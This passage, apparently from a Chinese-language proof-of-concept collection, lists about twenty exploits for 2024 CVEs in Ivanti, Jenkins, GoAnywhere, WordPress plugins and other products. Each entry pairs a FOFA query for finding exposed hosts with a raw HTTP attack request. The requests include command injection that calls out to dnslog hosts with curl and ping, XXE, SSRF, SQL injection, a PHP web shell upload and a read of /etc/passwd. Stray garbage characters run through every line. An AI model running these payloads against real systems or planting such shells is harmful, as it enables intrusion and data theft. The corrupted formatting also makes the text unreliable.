: T0 @5 B( f: N( v9 J* iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 u, [" R3 I( B0 o6 Q5 y3 u6 W
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 c2 @7 g! o% Z. X" c/ q
X-Requested-With: XMLHttpRequest
* \) p1 g1 d" j7 j8 ^3 P2 W0 o6 A
& O* U5 a: C$ J9 }$ w" ?id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B, H$ \# i4 b% y$ p
1 ]# J: g+ f/ [1 J# N1 X
& y2 u: ]: X# f% s% r99. Ncast盈可视高清智能录播系统busiFacade RCE
1 Q2 }# w. j; Y7 aCVE-2024-0305
: N$ b4 [# c6 B8 H$ aFOFA:app="Ncast-产品" && title=="高清智能录播系统"
5 p% Q% P% Q+ c- B% LPOST /classes/common/busiFacade.php HTTP/1.13 u. k5 u( n2 r( K; u4 k, @
Host: 192.168.40.130:8080
2 t+ q% e7 y8 a5 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; c( d' o2 a. l; J( ^Connection: close& ~; q. N& x; J* q- C
Content-Length: 1548 F. G( ?* ~, S t
Accept: */*0 @# x% }$ \* v% m' [% j2 l
Accept-Encoding: gzip, deflate& f% I- Q* `/ ?! i* |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' h' y B% G6 I' o: S9 v$ ~9 R4 p) XContent-Type: application/x-www-form-urlencoded; charset=UTF-8, [# m# \- L) j5 X
X-Requested-With: XMLHttpRequest% V/ J" u0 _9 s' S0 z( M$ A. ~
, Q5 e# E& C2 L& f8 Q1 \5 L
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
8 _" n# p2 c" V% R8 b
s- i8 h+ p* H5 D' p) b7 y( B
; p: m8 I6 k5 n5 V4 x2 _5 M7 R3 H100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传% g% v! ^ [ G. T% p: N
CVE-2024-0352
8 g6 }$ p$ T5 g4 c& m0 oFOFA:icon_hash="874152924"" V( \- h6 M. `2 `+ G0 W
POST /api/file/formimage HTTP/1.1
' I/ v! i. _- v! THost: 192.168.40.130
$ q# s+ S2 |4 j$ K! y1 X3 D& p$ SUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
- y: J% \, C2 SConnection: close* b! \1 `& Y8 O- X# `9 m
Content-Length: 2012 U7 P& t7 P1 `+ t6 y7 A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
; S" k' s' ~8 G2 AAccept-Encoding: gzip; z$ E) `! N5 z. I/ B; o
" ]& S+ s0 P0 w0 C) K! @4 u% u
------WebKitFormBoundarygcflwtei. l% n; M2 G U$ h' l* o
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
2 P1 W7 b4 D" E$ T+ SContent-Type: application/x-php5 U6 i( a% e3 k8 | d4 c
% S) l0 y- i) a8 C
2ayyhRXiAsKXL8olvF5s4qqyI2O
9 d/ L& f, R' k0 O/ J/ v0 V3 i( L------WebKitFormBoundarygcflwtei--
7 n9 q: R& n9 x( Y# V
0 Z ~; R' y7 w0 n3 ^7 {. L& m/ W; r2 x& l/ ?! n' O
101. ivanti policy secure-22.6命令注入. f# N: L3 v; F9 E
CVE-2024-21887
/ X+ Q% T: D5 k+ l1 m( K( l+ D* o; GFOFA:body="welcome.cgi?p=logo"+ ^; D7 K, ] N* l- c
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
: ~. I3 b& D( Z2 p# GHost: x.x.x.xx.x.x.x
- X+ K% \6 a( `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 t/ A! [4 @: Q
Connection: close
1 f0 e3 m% i6 u: P/ _9 y3 K2 xAccept-Encoding: gzip
- R0 \& @1 t& R$ T. e( L7 l9 K5 D) w2 Y, G- L9 k' P
6 a+ [, t1 v j( c, ~- i+ T
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
( z& h' h r0 j$ M+ kCVE-2024-21893, U' A' p/ |, b: @9 o0 b
FOFA:body="welcome.cgi?p=logo"; f0 y2 l: _1 Z) v% d, W1 h
POST /dana-ws/saml20.ws HTTP/1.1( m, C1 @3 Q" r! r8 e8 h5 P
Host: x.x.x.x
! K7 o" Y& t5 G$ ?9 i! g% _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% U( y* m- O. f* U2 R- yConnection: close( h& L# \) x" i+ i% P$ v
Content-Length: 792
8 q( p9 g% k' g* t8 b% N0 OAccept-Encoding: gzip' U8 O9 t/ ]( a+ G2 r( @, z6 g3 [) |
" ^9 h6 p/ H4 `4 b<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>* U. T" S( P$ }4 M
' w/ g2 r5 m+ [3 Z, A* X J
103. Ivanti Pulse Connect Secure VPN XXE' B" G6 w* T3 r$ z
CVE-2024-220247 N" l" M$ l# B( j
FOFA:body="welcome.cgi?p=logo". t1 l, {/ X/ R" U
POST /dana-na/auth/saml-sso.cgi HTTP/1.1+ {0 r! m+ |3 s9 E( h% ?
Host: 192.168.40.130:1119 ~9 m! K# ] O0 r0 {
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; g& z) | N$ w1 T M. {Connection: close; ^, C1 U/ {0 I( x& [+ M/ i
Content-Length: 204% h/ F2 |" H. F3 L" B
Content-Type: application/x-www-form-urlencoded
6 r: z4 c U6 jAccept-Encoding: gzip
1 J5 \+ ]6 P; x5 G, W# }( W. P* N
$ |3 W9 s# q6 d9 xSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==- F: k! X9 `' A* L X9 g
. K7 f3 B9 K* b0 ~# Z0 Y5 G; t1 q
6 K* q! s: L7 a4 R其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
8 S2 B1 t1 d7 y6 ?<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>: X5 j( K+ [, c9 @, ]7 q1 T: x# E
& T5 C8 @9 O1 @/ ?. k0 R5 y+ U
9 }; T/ T% [1 P104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
& ^: k1 h9 K0 _: ^( BCVE-2024-05694 e# [ |; l5 M) o3 Z4 ^; m
FOFA:title="TOTOLINK"! ?1 ~) n* Z! z" S1 U' e6 i
POST /cgi-bin/cstecgi.cgi HTTP/1.14 S% m1 X' [5 l7 o# k
Host:192.168.0.1( M; }0 }. U/ o# B! i8 \3 O6 s
Content-Length:419 n+ J& S% y6 e( x. f4 l5 A
Accept:application/json,text/javascript,*/*;q=0.01
5 S$ u- n, \+ _' B5 mX-Requested-with: XMLHttpRequest% M3 @3 a" I/ a7 M
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36+ |- G/ S3 l7 A T: A7 c
Content-Type: application/x-www-form-urlencoded:charset=UTF-8" B/ @6 J1 e7 p0 p; {- O3 A: A
Origin: http://192.168.0.1
: {, p' \! ]% H0 RReferer: http://192.168.0.1/advance/index.html?time=1671152380564
4 B- j Z, v' I+ \$ `Accept-Encoding:gzip,deflate# N" U; f+ ]( G. `3 I: Q2 P
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.71 S: _5 @+ Z! r7 `7 c
Connection:close; ^, H/ M) W4 s# ~! W6 o
7 g) {5 e& w g: W# W
{8 \, h. H1 ? \3 k2 d
"topicurl":"getSysStatusCfg",2 S/ { {' S( ` A; H) E! d
"token":""
% Y6 C# V+ U4 ~, G1 ~5 v4 M( H% [}
1 H3 z% |9 R* f3 Q- [: R8 E( i/ i% l8 t) f# ] W
105. SpringBlade v3.2.0 export-user SQL 注入
6 R% m, m8 z/ @# e6 QFOFA:body="https://bladex.vip"+ B1 l$ ?! B* v5 E
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
+ V2 }; r" \" L; M1 D
7 w6 X. v/ h% F! t% \106. SpringBlade dict-biz/list SQL 注入
, f3 X s# S. V9 a! gFOFA:body="Saber 将不能正常工作"0 o+ j. M3 h7 K1 h" L: {- x
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 r- k! p: ]9 n' Z( \4 J0 _ J1 oHost: your-ip
7 G: ^ l# f$ @# x1 k9 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ X1 m" j* w! s6 v$ R
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
" o5 g: v7 {, I) E4 IAccept-Encoding: gzip, deflate, {' Z+ v7 @1 t; M2 i8 F
Accept-Language: zh-CN,zh;q=0.9
) G( I& Y: S! uConnection: close
& _4 U1 U5 `- J/ o. l
* j& z- b5 Q7 k1 G y( W7 w& U
9 U+ K: i4 @: }# E* Y) P6 o107. SpringBlade tenant/list SQL 注入* Z) P1 M( }! O8 ^) S! E! x: o' C
FOFA:body="https://bladex.vip"
) E, Y! u; w; s/ _7 P" rGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 o+ H* X# U) v. x& G
Host: your-ip1 w4 P3 Q# w$ I8 h% t/ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 b) s4 f( o5 q0 f8 `3 y; rBlade-Auth:替换为自己的8 M' ^- L, |9 x8 o$ V! y, m
Connection: close
$ V! p9 K5 z' K6 N$ ?% y9 P9 a# g* `( R& c0 A2 {" @
6 y1 _8 R) K6 ]+ E
108. D-Tale 3.9.0 SSRF
0 A2 ?* E5 X% ^$ l9 {CVE-2024-21642
/ l" a0 |1 N& N! P* I, {FOFA:"dtale/static/images/favicon.png"* }( M% p( O: Q' p L) C, g
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
8 r* q: }7 _( @/ QHost: your-ip
9 q' @; M/ s( j& `$ HAccept: application/json, text/plain, */*
& Z" \9 T# y. c" @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 a2 U" T9 y. Z0 c
Accept-Encoding: gzip, deflate
: P. e) V( i- `9 uAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* U! T1 f/ C9 r7 C/ L
Connection: close
8 G. S* k& I7 `- }0 w6 L* b u) s
/ s# v4 k S0 L, [+ y
" }: y9 j5 v$ ~/ ]109. Jenkins CLI 任意文件读取
' S& r6 E/ K% c# I& wCVE-2024-23897: p/ f1 S# p4 _' ?3 f
FOFA:header="X-Jenkins"- @/ f# ]. J* k' w
POST /cli?remoting=false HTTP/1.1
6 { C/ n; m) k4 `# o0 y" I. A* Q( gHost:
$ ~* Z4 x1 O# s. [6 M7 P/ |Content-type: application/octet-stream9 J! k# k! i5 x- K
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 r4 ^" M4 k( Q" l$ O6 i' RSide: upload
" \" |; m+ x# t3 X: C4 TConnection: keep-alive* q g4 n/ L' T( X% s$ X! e
Content-Length: 163
; x9 x/ ` r# R2 s
6 b" ^( o. ~' B; q1 f2 qb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
9 X: g: [% A5 a+ }1 D8 I, X s) Q' e( _
; Q7 e1 x5 X' m! l
POST /cli?remoting=false HTTP/1.1, n/ g) U, G# s _. h& @- I" B7 n0 J
Host:& f. H) }2 U# L) h3 {: u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92* o( G5 {8 S' a I: w
download
" W! `9 Y& @) {Content-Type: application/x-www-form-urlencoded
( [) `/ d3 f# f( E7 g( V* c F) TContent-Length: 0# j8 a- k* N4 l6 F7 i9 G, K% g; [
% R# a! z' s: V1 D: i
6 E: \+ z% q7 u- V. ? e
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
7 D m8 h+ |- G/ x/ F' E8 h. f, Gjava -jar jenkins-cli.jar help: B& N/ c* M3 {8 | R8 k- ~0 J
[COMMAND]/ K% I" I; Q1 \6 N5 b0 f# L: D% Y
Lists all the available commands or a detailed description of single command.
9 \* j9 W$ D' ~, z( ~% ]# l COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)6 ?, {* W! H0 t2 J3 o' u
) p: U! w5 A/ b+ q4 [3 B s
' V& [$ ]2 L ^' P1 p% f) O e110. Goanywhere MFT 未授权创建管理员
7 c, k3 ~, O$ ?) s8 J" G+ |. m5 [CVE-2024-02043 i2 v, Y* X' k
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932", [0 b y: T) G. h; n2 H
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1; M9 J/ I5 v: F8 E8 a/ q- v
Host: 192.168.40.130:8000
& L1 Y3 u3 r5 W3 nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36& z% c- Y# E" W
Connection: close* k1 @0 q" P6 g5 D/ F
Accept: */*- k# L1 \; v' N+ U* e& J7 Z* ?) E
Accept-Language: en7 W: S8 O' j& q" K
Accept-Encoding: gzip4 J1 P# _5 w7 s S4 D/ ?9 [
6 q( i! \; e. r# @# }7 K$ V( [8 k
8 F' b7 X: G$ m& D7 c4 g. x111. WordPress Plugin HTML5 Video Player SQL注入
6 k b" T1 X, N7 z1 yCVE-2024-10619 U9 X; q5 W( ?# E T' t
FOFA:"wordpress" && body="html5-video-player"3 s5 f4 S9 o( B0 _2 X
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
' ~/ L, G3 ~8 c6 HHost: 192.168.40.130:1123 y& L9 y) T& K. I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ Y! t. v ?& k+ |8 k7 I) l# f
Connection: close
6 a5 C& \2 r- K5 R/ Q9 w1 H$ [Accept: */*8 {1 f8 o5 D, Z/ M9 o
Accept-Language: en, | C1 v* N8 r, z
Accept-Encoding: gzip/ V) P0 H$ ?8 X+ D {! F s+ F. j
X" V7 a0 i: s4 Q5 m+ ^1 J3 Q
q1 H; P& t2 i( l1 @: S! ~112. WordPress Plugin NotificationX SQL 注入
* O$ D" [: t, e- ]2 c; b" QCVE-2024-1698! I. T9 a T" y& J \
FOFA:body="/wp-content/plugins/notificationx"& H8 F9 p1 r2 p' e
POST /wp-json/notificationx/v1/analytics HTTP/1.1+ P! o5 k4 s" g; X
Host: {{Hostname}}
" s) ^" m5 a7 R8 D! C# X! @Content-Type: application/json
- Q% @" x" o% }8 x: T" e2 k5 u W1 J0 R9 S7 \+ o2 m; R
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}8 X1 p- U6 ?( t4 Q
* ]: P/ L0 g6 T0 I" p g5 d4 n
' v/ F& y% Z- l, A% W3 q113. WordPress Automatic 插件任意文件下载和SSRF) c; q+ r$ e( Q& \
CVE-2024-279545 Z9 Q8 B0 F4 A, P: _; T/ P6 I
FOFA:"/wp-content/plugins/wp-automatic": a: _; v1 H- N& j# J( d
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
1 I" q' S( o KHost: x.x.x.x
# |; t X+ Z$ V4 x3 R# G! NUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
. R t! C' f! D9 h: ?" v: S% ^( QConnection: close
$ m! c2 ~! S/ }% l# p& c. b$ GAccept: */*
9 s$ w+ W; p$ q7 ?; |/ ZAccept-Language: en& }9 ~1 q- m" w; ]1 c$ g
Accept-Encoding: gzip
0 Z: `: @* L- ]. b. J P6 J; ? C# C3 C4 u( t/ d
' A5 v, p( {5 H g2 ?
114. WordPress MasterStudy LMS插件 SQL注入
# H. h7 ?. B) o' |6 w; f6 aFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
1 s& e3 v! c7 N1 @+ m7 Q) [5 i/ _GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
8 S* V* z" |& i0 fHost: your-ip
" l- B3 [" W" H: M' M& ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 t( X% B+ v0 t( h: X
Accept-Charset: utf-81 H8 e$ }6 X! @; o$ w. r6 ^. q
Accept-Encoding: gzip, deflate
1 d9 E( x3 l* h/ K5 h# \Connection: close6 g! e2 n$ c7 C: \' `
( k' `( ~5 H& V: q, u+ ?" P- w
115. WordPress Bricks Builder <= 1.9.6 RCE
* G) I! u) w# b% A- z! L: v [CVE-2024-25600- }: y. T2 @3 C9 _: x
FOFA: body="/wp-content/themes/bricks/": R, y3 X% K8 x8 I7 U3 ^
第一步,获取网站的nonce值
) z2 \ ^1 X" h9 o( vGET / HTTP/1.1
4 O6 N. R) q" l' P1 O# e4 xHost: x.x.x.x
. y/ H' P: O1 K6 d3 W- |User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
1 N0 E0 {/ I& C% i6 N/ P0 Y3 h/ |- NConnection: close
1 w/ |, s/ u4 o8 |Accept-Encoding: gzip$ K# S1 K/ @5 c" Z! ], W
& C r' d3 k) r; a9 a4 S
4 B- E8 Q# M5 {5 i
第二步替换nonce值,执行命令
) B- o, _4 m- y+ Q3 R$ J F9 FPOST /wp-json/bricks/v1/render_element HTTP/1.1$ T( V) \' f' @8 A
Host: x.x.x.x7 {; E& P" }4 ]" W! a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( D# E/ ^. S( j8 ~, S7 S) E
Connection: close# J! X* n$ r7 X( g5 ?) N6 D
Content-Length: 356
! o9 D! Z2 c1 N q+ b9 c2 y" {% oContent-Type: application/json
# W* o" b& v9 p; Z# KAccept-Encoding: gzip
) ]9 F# w5 U2 K! o, s3 h) t
" g7 J6 V, B2 ~8 t* k' G# ]{
3 ^2 n( Z1 Z+ W& R"postId": "1",1 n' [( E9 d- n, [% t' [
"nonce": "第一步获得的值",& I2 ^+ r% i2 o5 S
"element": {
$ R- l7 J/ O8 ?5 g, F$ @ "name": "container",9 T5 i) b4 L$ z8 R. d
"settings": {8 g& t0 V/ ]- Q, ~& z
"hasLoop": "true",
" Q$ W2 J1 `2 U V$ J "query": {1 W# z b2 z5 A% U2 N
"useQueryEditor": true, Q: K- y3 ]0 V% t, c3 ]
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 B/ a _ Y1 U/ L6 p "objectType": "post"
+ f9 f2 P1 v4 ]2 G7 F( y% ~1 L }; L( }, t/ s- F) b) n
}
; Y3 l7 _' [8 ]2 h }) d9 T- v* s( A2 }: D
}7 ]5 O3 K/ y& H% K. F3 z
3 o3 A8 n& ]4 \, S! ?: v; J4 q' r
116. wordpress js-support-ticket文件上传" Y0 w7 E% |+ ?. m
FOFA:body="wp-content/plugins/js-support-ticket"
/ K/ r1 [8 r G KPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.19 G& R; f! p8 J( d( J7 m" }8 F
Host:. O" `3 N' f; X+ r! i
Content-Type: multipart/form-data; boundary=--------767099171
7 }3 o1 s, c( Y! f) GUser-Agent: Mozilla/5.0
5 C* X4 M. v9 |4 A5 Z2 p5 a1 ^/ N' X2 o7 [3 i' q" z9 T
----------767099171
4 I5 V3 {" |3 V( x8 N% f8 u$ S& wContent-Disposition: form-data; name="action", q2 i+ x1 P5 G' W6 g2 T6 K/ E
configuration_saveconfiguration$ U. d! N, x/ s$ j2 r8 [
----------767099171, L8 n. t- H. E) L
Content-Disposition: form-data; name="form_request"# Y4 Q2 d/ G, V
jssupportticket: w& k; Q* r( R
----------767099171
+ S$ X8 ~) F; I/ A. B. pContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
6 S$ s$ Q6 V- {4 l9 T. `" AContent-Type: image/png& \6 H% _3 B1 I) {2 l, L: G
----------767099171--1 T' P3 k ?$ {6 v$ x; G4 E
- h }; Y. c* |- ]& v* V" ~- r* d3 a) e& Z( v5 V# q
117. WordPress LayerSlider插件SQL注入+ f `5 W3 h/ X; X# w
version:7.9.11 – 7.10.0" w; N5 K' Y( Z/ o
FOFA:body="/wp-content/plugins/LayerSlider/"
: m. U7 Y' F3 @: a1 FGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
7 h+ ^) |1 j! a- CHost: your-ip% E) z' @3 l3 q8 A0 B: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ @) Q' E9 d2 N- M! C2 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 V1 Q q4 P) y0 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 W2 D8 i4 X2 H$ R1 u. B/ `; zAccept-Encoding: gzip, deflate, br
5 X3 O2 s _! g, a% g6 B; RConnection: close1 o* [4 g7 w; C& U
Upgrade-Insecure-Requests: 18 N% A4 e2 i+ _, m3 Z0 [& ?2 Q
. `! A0 y$ ^/ t( j- f1 y
/ f0 j' ?7 ?) q4 {. G1 ~/ c" c% h118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 I: ~' m; {; F# I0 _! aCVE-2024-0939
* g7 J% m! b9 h, q6 f1 y% s' zFOFA:title="Smart管理平台"
: T. u: t5 \$ w$ q) E3 P, `POST /Tool/uploadfile.php? HTTP/1.18 e) ?' M, T4 V2 }' g
Host: 192.168.40.130:8443
7 Y2 Y9 F2 p" c: H0 |7 O9 xCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8" b; e4 h+ J/ a1 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
6 g# X4 b' t/ y# qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* k! [0 `7 ^9 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 b0 ~; ^0 }* h3 oAccept-Encoding: gzip, deflate: ^( l! J& u. M. N: G: U
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
z9 ^' {) a n7 [Content-Length: 405
8 f' V# a5 H$ @Origin: https://192.168.40.130:8443; |' g6 o! C/ Z+ Q, K( \- u
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
5 N/ \% m/ j7 s& p7 ^7 YUpgrade-Insecure-Requests: 1; W/ |( R* X+ S- l0 Y$ u$ F
Sec-Fetch-Dest: document5 |: W. ]* O8 s. ]1 D) f/ ]4 U
Sec-Fetch-Mode: navigate
, x. m! w2 f9 y$ nSec-Fetch-Site: same-origin
8 z7 T. z7 @6 M* QSec-Fetch-User: ?1; e" M4 \$ Z& a6 t: H$ {/ N% G
Te: trailers |0 C7 V2 `, u e! w) \! u
Connection: close; R# W6 D& n- L/ t
- R h; }8 Z; Z1 J) {; `/ _-----------------------------13979701222747646634037182887) l. b$ p6 w4 Q/ Y$ j) Y1 n( L
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
$ G) S% t c! q$ q, M6 [Content-Type: application/octet-stream
" e0 T4 l o- A9 Z4 y4 p, z- }9 c/ D6 c8 o& e" x+ W7 _
<?php3 X* L# U; e2 C
system($_POST["passwd"]);
5 z w9 N9 H. @6 f?>
" X3 G9 d# T. d- [7 {-----------------------------13979701222747646634037182887) C# l) T# p7 L: K) ?8 n
Content-Disposition: form-data; name="txt_path"
' x% w3 I9 D+ O+ J2 u
. ?+ J2 K8 n! m9 a$ h, B- |/home/src.php
z i2 o3 d! _! c-----------------------------13979701222747646634037182887--/ Z1 k9 H% w. P7 T: O+ ~* c
9 H, A5 d- R( b, L
2 ? \) B- z1 ]# Z: |访问/home/src.php g1 u7 V+ R k8 u- T( {
2 w) X8 O2 h* |- y; i119. 北京百绰智能S20后台sysmanageajax.php sql注入) g' F& a: X, A) ^# g1 e
CVE-2024-1254
( y6 T; ~, b4 p4 IFOFA:title="Smart管理平台"
, k G* G3 ]; N; Z先登录进入系统,默认账号密码为admin/admin
: I, ]) p; |. F& ~1 v, T; ~ UPOST /sysmanage/sysmanageajax.php HTTP/1.116 _$ ]- j' C; J* D6 x$ O
Host: x.x.x.x5 \( d7 A8 L, ?+ B1 ?5 }4 }8 y
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee* l& \) V, o6 Q& E' p' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0. ^6 c# U1 O3 Z. K4 F% e3 X4 a/ I
Accept: */*
% g3 ^) i1 j5 S2 F2 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 T! S. g) ^+ d4 i
Accept-Encoding: gzip, deflate
" `/ M5 p& w& G/ N& IContent-Type: application/x-www-form-urlencoded;" K2 q3 e% x' s9 w1 B$ ?
Content-Length: 109
1 N+ ^0 W# C0 T) y! HOrigin: https://58.18.133.60:8443
" `( E& z! [3 h2 pReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
/ Y, q0 |$ m K2 aSec-Fetch-Dest: empty
7 x$ M% ^& ~( v* C5 [; R5 p$ LSec-Fetch-Mode: cors1 G9 q. P% m6 z' ]/ t
Sec-Fetch-Site: same-origin! g5 G% V; j# T; \/ \
X-Forwarded-For: 1.1.1.1
" K" F1 u/ I$ }. z6 p# S4 @X-Originating-Ip: 1.1.1.11 X% h o Z, F
X-Remote-Ip: 1.1.1.1
